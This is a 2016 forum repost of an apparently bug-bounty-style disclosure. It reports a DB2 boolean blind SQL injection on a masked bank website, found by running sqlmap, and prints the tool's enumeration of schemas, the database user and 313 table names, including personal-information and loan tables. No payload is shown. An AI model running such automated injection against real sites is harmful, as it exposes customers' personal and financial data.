HanDs
管理员

[7月漏洞公开] 某银行主站伪静态DB2布尔盲注 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

.

详细说明:

这个也帮忙给审核下吧 thanks

http://**.**.**.**/bugs/wooyun-2016-0211479/trace/8722c6d1776df3a473e61e3dc44c12f9





http://**.**.**.**/Site/Home/CN



1.png



2.png



3.png



4.png





没waf 直接上sqlmap 未脱裤

available databases [10]:

[*] DB2INST1

[*] NULLID

[*] SQLJ

[*] SYSCAT

[*] SYSFUN

[*] SYSIBM

[*] SYSIBMADM

[*] SYSPROC

[*] SYSSTAT

[*] SYSTOOLS



current database: 'CMSDB'



database management system users [1]:

[*] DB2INST1

漏洞证明:

[313 tables]

+--------------------------------+

| ADVISE_WORKLOAD |

| AREA |

| AREA_EMAIL |

| COMPANY_LOANS |

| D2S_BLOCK_TEMPLATEMAP |

| D2S_CHANEL_CHANEL_RELATIONSHIP |

| D2S_CHANNEL_BLOCKMAP |

| D2S_CHANNEL_INFO_RELATIONSHIP |

| D2S_CHANNEL_TEMPLATEMAP |

| D2S_INFO_BLOCKMAP |

| D2S_INFO_CHANNEL_RELATIONSHIP |

| D2S_INFO_INFO_RELATIONSHIP |

| D2S_INFO_TEMPLATEMAP |

| D2S_TEMPLATE |

| EMAIL_SEND_LOG |

| EXPLAIN_ARGUMENT |

| EXPLAIN_INSTANCE |

| EXPLAIN_OBJECT |

| EXPLAIN_OPERATOR |

| EXPLAIN_PREDICATE |

| EXPLAIN_STATEMENT |

| EXPLAIN_STREAM |

| LOANS_TYPE |

| LOANS_VARIETIES |

| PERSONAL_BUSINESS_LOANS |

| PERSONAL_CONSUMER_LOANS |

| PERSONAL_INFORMATION |

| PERSONAL_LOANS_REF |

| T_CHANNEL_OPERATOR |

| T_CMSWF_DEF_SET |

| T_CMSWF_DESIGN_TRACK |

| T_CMSWF_SITE_MAP |

| T_CMS_CHANNELWORKFLOW |

| T_CMS_CHANNEL_RSS |

| T_CMS_D2S_EVENT |

| T_CMS_DEPARTMENT |

| T_CMS_DUTY |

| T_CMS_ENTITYWORKFLOW |

| T_CMS_ENTITYWORKFLOW_SET |

| T_CMS_HOTKEY |

| T_CMS_KEYCLASS |

| T_CMS_KEYWORD |

| T_CMS_MEMBER |

| T_CMS_MEMBERGROUP_PERMISSION_R |

| T_CMS_MEMBER_GROUP |

| T_CMS_MEMBER_GROUP_RELATION |

| T_CMS_MEMBER_PERMISSION |

| T_CMS_QUICKLINK |

| T_CMS_ROLE |

| T_CMS_RSS |

| T_CMS_SEARCH_FULL |

| T_CMS_STATISTIC |

| T_CMS_STATISTIC_TEMP |

| T_CMS_STATUS_MENU |

| T_CMS_SURVEY_QUESTIONNAIRE |

| T_CMS_SYSTEM |

| T_CMS_USER |

| T_CMS_USERGROUP |

| T_CMS_USER_DUTY |

| T_CMS_USER_LANAGER |

| T_CMS_USER_MENU |

| T_CMS_USER_ROLE |

| T_CMS_USER_SITE |

| T_CMS_USER_SITEHOME |

| T_CONTENT |

| T_FILE |

| T_FILE_CMSTOPIC_M |

| T_FILE_CMSTOPIC_S |

| T_FILE_CMS_ADVERT_M |

| T_FILE_CMS_ADVERT_S |

| T_FILE_CMS_ADV_CAT_M |

| T_FILE_CMS_ADV_CAT_S |

| T_FILE_CMS_CHANNEL_M |

| T_FILE_CMS_CHANNEL_S |

| T_FILE_CMS_FEDBCAT_M |

| T_FILE_CMS_FEDBCAT_S |

| T_FILE_CMS_FEEDBAK_M |

| T_FILE_CMS_FEEDBAK_S |

| T_FILE_CMS_FILE_M |

| T_FILE_CMS_FILE_S |

| T_FILE_CMS_FOLDER_M |

| T_FILE_CMS_FOLDER_S |

| T_FILE_CMS_INFO_M |

| T_FILE_CMS_INFO_S |

| T_FILE_CMS_LANG_M |

| T_FILE_CMS_LANG_S |

| T_FILE_CMS_LINK_C_M |

| T_FILE_CMS_LINK_C_S |

| T_FILE_CMS_LINK_M |

| T_FILE_CMS_LINK_S |

| T_FILE_CMS_PER_COL_M |

| T_FILE_CMS_PER_COL_S |

| T_FILE_CMS_PER_C_M |

| T_FILE_CMS_PER_C_S |

| T_FILE_CMS_PER_M |

| T_FILE_CMS_PER_S |

| T_FILE_CMS_PRODUCT_M |

| T_FILE_CMS_PRODUCT_S |

| T_FILE_CMS_REMARK_M |

| T_FILE_CMS_REMARK_S |

| T_FILE_CMS_SITE_M |

| T_FILE_CMS_SITE_S |

| T_FILE_CMS_SURVEY_M |

| T_FILE_CMS_SURVEY_S |

| T_FILE_CMS_SUR_CAT_M |

| T_FILE_CMS_SUR_CAT_S |

| T_FILE_CMS_SUR_INF_M |

| T_FILE_CMS_SUR_INF_S |

| T_FILE_CMS_SUR_QUS_M |

| T_FILE_CMS_SUR_QUS_S |

| T_FILE_PERMISSION |

| T_FILE_PERMISSION_SPLIT |

| T_FILE_ROOTTYPE_M |

| T_FILE_ROOTTYPE_S |

| T_FILE_VERSION |

| T_FILE_VERSION_CMSTOPIC_M |

| T_FILE_VERSION_CMSTOPIC_S |

| T_FILE_VERSION_CMS_ADVERT_M |

| T_FILE_VERSION_CMS_ADVERT_S |

| T_FILE_VERSION_CMS_ADV_CAT_M |

| T_FILE_VERSION_CMS_ADV_CAT_S |

| T_FILE_VERSION_CMS_CHANNEL_M |

| T_FILE_VERSION_CMS_CHANNEL_S |

| T_FILE_VERSION_CMS_FEDBCAT_M |

| T_FILE_VERSION_CMS_FEDBCAT_S |

| T_FILE_VERSION_CMS_FEEDBAK_M |

| T_FILE_VERSION_CMS_FEEDBAK_S |

| T_FILE_VERSION_CMS_FILE_M |

| T_FILE_VERSION_CMS_FILE_S |

| T_FILE_VERSION_CMS_FOLDER_M |

| T_FILE_VERSION_CMS_FOLDER_S |

| T_FILE_VERSION_CMS_INFO_M |

| T_FILE_VERSION_CMS_INFO_S |

| T_FILE_VERSION_CMS_LANG_M |

| T_FILE_VERSION_CMS_LANG_S |

| T_FILE_VERSION_CMS_LINK_C_M |

| T_FILE_VERSION_CMS_LINK_C_S |

| T_FILE_VERSION_CMS_LINK_M |

| T_FILE_VERSION_CMS_LINK_S |

| T_FILE_VERSION_CMS_PER_COL_M |

| T_FILE_VERSION_CMS_PER_COL_S |

| T_FILE_VERSION_CMS_PER_C_M |

| T_FILE_VERSION_CMS_PER_C_S |

| T_FILE_VERSION_CMS_PER_M |

| T_FILE_VERSION_CMS_PER_S |

| T_FILE_VERSION_CMS_PRODUCT_M |

| T_FILE_VERSION_CMS_PRODUCT_S |

| T_FILE_VERSION_CMS_REMARK_M |

| T_FILE_VERSION_CMS_REMARK_S |

| T_FILE_VERSION_CMS_SITE_M |

| T_FILE_VERSION_CMS_SITE_S |

| T_FILE_VERSION_CMS_SURVEY_M |

| T_FILE_VERSION_CMS_SURVEY_S |

| T_FILE_VERSION_CMS_SUR_CAT_M |

| T_FILE_VERSION_CMS_SUR_CAT_S |

| T_FILE_VERSION_CMS_SUR_INF_M |

| T_FILE_VERSION_CMS_SUR_INF_S |

| T_FILE_VERSION_CMS_SUR_QUS_M |

| T_FILE_VERSION_CMS_SUR_QUS_S |

| T_FILE_VERSION_LABEL |

| T_FILE_VERSION_ROOTTYPE_M |

| T_FILE_VERSION_ROOTTYPE_S |

| T_FOLDER |

| T_FOLDER_ALIAS |

| T_FOLDER_CMSTOPIC_M |

| T_FOLDER_CMSTOPIC_S |

| T_FOLDER_CMS_ADVERT_M |

| T_FOLDER_CMS_ADVERT_S |

| T_FOLDER_CMS_ADV_CAT_M |

| T_FOLDER_CMS_ADV_CAT_S |

| T_FOLDER_CMS_CHANNEL_M |

| T_FOLDER_CMS_CHANNEL_S |

| T_FOLDER_CMS_FEDBCAT_M |

| T_FOLDER_CMS_FEDBCAT_S |

| T_FOLDER_CMS_FEEDBAK_M |

| T_FOLDER_CMS_FEEDBAK_S |

| T_FOLDER_CMS_FILE_M |

| T_FOLDER_CMS_FILE_S |

| T_FOLDER_CMS_FOLDER_M |

| T_FOLDER_CMS_FOLDER_S |

| T_FOLDER_CMS_INFO_M |

| T_FOLDER_CMS_INFO_S |

| T_FOLDER_CMS_LANG_M |

| T_FOLDER_CMS_LANG_S |

| T_FOLDER_CMS_LINK_C_M |

| T_FOLDER_CMS_LINK_C_S |

| T_FOLDER_CMS_LINK_M |

| T_FOLDER_CMS_LINK_S |

| T_FOLDER_CMS_PER_COL_M |

| T_FOLDER_CMS_PER_COL_S |

| T_FOLDER_CMS_PER_C_M |

| T_FOLDER_CMS_PER_C_S |

| T_FOLDER_CMS_PER_M |

| T_FOLDER_CMS_PER_S |

| T_FOLDER_CMS_PRODUCT_M |

| T_FOLDER_CMS_PRODUCT_S |

| T_FOLDER_CMS_REMARK_M |

| T_FOLDER_CMS_REMARK_S |

| T_FOLDER_CMS_SITE_M |

| T_FOLDER_CMS_SITE_S |

| T_FOLDER_CMS_SURVEY_M |

| T_FOLDER_CMS_SURVEY_S |

| T_FOLDER_CMS_SUR_CAT_M |

| T_FOLDER_CMS_SUR_CAT_S |

| T_FOLDER_CMS_SUR_INF_M |

| T_FOLDER_CMS_SUR_INF_S |

| T_FOLDER_CMS_SUR_QUS_M |

| T_FOLDER_CMS_SUR_QUS_S |

| T_FOLDER_PERMISSION |

| T_FOLDER_PERMISSION_SPLIT |

| T_FOLDER_ROOTTYPE_M |

| T_FOLDER_ROOTTYPE_S |

| T_FOLDER_VERSION |

| T_FOLDER_VERSION_CMSTOPIC_M |

| T_FOLDER_VERSION_CMSTOPIC_S |

| T_FOLDER_VERSION_CMS_ADVERT_M |

| T_FOLDER_VERSION_CMS_ADVERT_S |

| T_FOLDER_VERSION_CMS_ADV_CAT_M |

| T_FOLDER_VERSION_CMS_ADV_CAT_S |

| T_FOLDER_VERSION_CMS_CHANNEL_M |

| T_FOLDER_VERSION_CMS_CHANNEL_S |

| T_FOLDER_VERSION_CMS_FEDBCAT_M |

| T_FOLDER_VERSION_CMS_FEDBCAT_S |

| T_FOLDER_VERSION_CMS_FEEDBAK_M |

| T_FOLDER_VERSION_CMS_FEEDBAK_S |

| T_FOLDER_VERSION_CMS_FILE_M |

| T_FOLDER_VERSION_CMS_FILE_S |

| T_FOLDER_VERSION_CMS_FOLDER_M |

| T_FOLDER_VERSION_CMS_FOLDER_S |

| T_FOLDER_VERSION_CMS_INFO_M |

| T_FOLDER_VERSION_CMS_INFO_S |

| T_FOLDER_VERSION_CMS_LANG_M |

| T_FOLDER_VERSION_CMS_LANG_S |

| T_FOLDER_VERSION_CMS_LINK_C_M |

| T_FOLDER_VERSION_CMS_LINK_C_S |

| T_FOLDER_VERSION_CMS_LINK_M |

| T_FOLDER_VERSION_CMS_LINK_S |

| T_FOLDER_VERSION_CMS_PER_COL_M |

| T_FOLDER_VERSION_CMS_PER_COL_S |

| T_FOLDER_VERSION_CMS_PER_C_M |

| T_FOLDER_VERSION_CMS_PER_C_S |

| T_FOLDER_VERSION_CMS_PER_M |

| T_FOLDER_VERSION_CMS_PER_S |

| T_FOLDER_VERSION_CMS_PRODUCT_M |

| T_FOLDER_VERSION_CMS_PRODUCT_S |

| T_FOLDER_VERSION_CMS_REMARK_M |

| T_FOLDER_VERSION_CMS_REMARK_S |

| T_FOLDER_VERSION_CMS_SITE_M |

| T_FOLDER_VERSION_CMS_SITE_S |

| T_FOLDER_VERSION_CMS_SURVEY_M |

| T_FOLDER_VERSION_CMS_SURVEY_S |

| T_FOLDER_VERSION_CMS_SUR_CAT_M |

| T_FOLDER_VERSION_CMS_SUR_CAT_S |

| T_FOLDER_VERSION_CMS_SUR_INF_M |

| T_FOLDER_VERSION_CMS_SUR_INF_S |

| T_FOLDER_VERSION_CMS_SUR_QUS_M |

| T_FOLDER_VERSION_CMS_SUR_QUS_S |

| T_FOLDER_VERSION_LABEL |

| T_FOLDER_VERSION_ROOTTYPE_M |

| T_FOLDER_VERSION_ROOTTYPE_S |

| T_INFO_OPERATOR |

| T_PAI_DEPARTMENT |

| T_PAI_DEPARTMENTROLERELATION |

| T_PAI_DEPT_DEPT |

| T_PAI_DEPT_GROUP |

| T_PAI_GROUPROLERELATION |

| T_PAI_GROUP_GROUP |

| T_PAI_GUSER_DEPARTMENT |

| T_PAI_GUSER_GROUP |

| T_PAI_GUSER_ROLE |

| T_PAI_HI_VALUE |

| T_PAI_HI_VALUE_GUSER |

| T_PAI_HI_VALUE_ROLE |

| T_PAI_REFRESHFLAG |

| T_PAI_ROLE |

| T_PAI_ROLE_ROLE |

| T_PAI_USER |

| T_PAI_USERGROUP |

| T_PERMISSION_SET |

| T_PERMISSION_SET_BLACK |

| T_PORTAL_PAGE_ACTION |

| T_PORTAL_PAGE_DEF |

| T_PORTAL_PAGE_FILTER |

| T_PORTAL_PAGE_ROLE_RELATION |

| T_PORTAL_PORTLET_DATA |

| T_PORTAL_PORTLET_DATA_STORE |

| T_PORTAL_PORTLET_INSTANCE |

| T_PORTAL_PORTLET_ROLE_RELATION |

| T_REFERENCE |

| T_REFERENCE_VERSION |

| T_SEQUENCE |

| T_SITE_TEMPLATE |

| T_SYSTEM |

| T_SYS_PERMISSION |

| T_TEMPLATE_CHANNELMAP |

| T_TEMPLATE_HOMEINFOMAP |

| T_TEMPLATE_INFOMAP |

| T_TYPE_DEFINITION |

| T_TYPE_INDEX |

| T_TYPE_INDEX_PROP |

| T_TYPE_PROPERTY |

| T_VALUE_ID |

| T_VERSION_CONTENT |

| T_WF_ACTIVITY |

| T_WF_ANDJOINENTRY |

| T_WF_COMMONRELEVANTDATA |

| T_WF_DEFINITION |

| T_WF_DEFINITIONFLAG |

| T_WF_EXTERNALRD |

| T_WF_PROCESS |

| T_WF_TESTCUSTOMRD |

| T_WF_USERACTION |

| T_WF_WORKITEM |

+--------------------------------+

修复方案:


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
#1楼
发帖时间:2016-7-11   |   查看数:0   |   回复数:0
游客组
快速回复